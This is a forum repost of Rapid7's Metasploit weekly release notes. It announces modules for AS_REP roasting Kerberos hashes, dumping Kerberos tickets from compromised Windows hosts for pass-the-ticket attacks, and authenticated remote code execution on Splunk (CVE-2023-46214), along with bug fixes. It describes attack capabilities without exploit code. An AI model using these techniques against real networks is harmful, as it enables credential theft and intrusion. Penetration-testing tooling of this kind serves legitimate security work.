National Cyber Warfare Foundation (NCWF) Forums


Metasploit Weekly Wrap-Up: Dec. 15, 2023


0 user ratings
2023-12-21 22:26:10
milo
Red Team (CNA)

 - archive -- 
Metasploit adds a dedicated module for AS_REP roasting and a post module for Kerberos ticket dumping.

Continuing the 12th Labor of Metasploit


Metasploit Weekly Wrap-Up: Dec. 15, 2023

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.


Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.


Ticket Management


This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible based on the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation right from with Metasploit, there’s even new documentation which outlines the entire process.


New module content (3)


Find Users Without Pre-Auth Required (ASREP-roast)


Author: smashery

Type: Auxiliary

Pull request: #18569 contributed by smashery

Path: gather/asrep


Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.


Splunk Authenticated XSLT Upload RCE


Authors: Valentin Lobstein, h00die, and nathan

Type: Exploit

Pull request: #18577 contributed by Chocapikk

Path: unix/http/splunk_xslt_authenticated_rce


Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.


Kerberos Ticket Management


Authors: Spencer McIntyre and Will Schroeder

Type: Post

Pull request: #18488 contributed by zeroSteiner

Path: windows/manage/kerberos_tickets


Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid.


Enhancements and features (3)



  • #18539 from dwelch-r7 - This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.

  • #18598 from bwatters-r7 - :

    This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.

  • #18601 from MikeAnast - Adds arm64 support to Metasploit's Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.


Bugs fixed (4)



  • #18606 from Lorenyx - rpc_plugin has been updated to correctly use the provided plugin options.

  • #18609 from adfoster-r7 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.

  • #18613 from dwelch-r7 - Ensures that after listing files within an SMB directory that the handle is closed.

  • #18614 from sjanusz-r7 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.


Documentation


You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate

and you can get more details on the changes since the last blog post from

GitHub:



If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the

commercial edition Metasploit Pro




Source: Rapid7
Source Link: https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.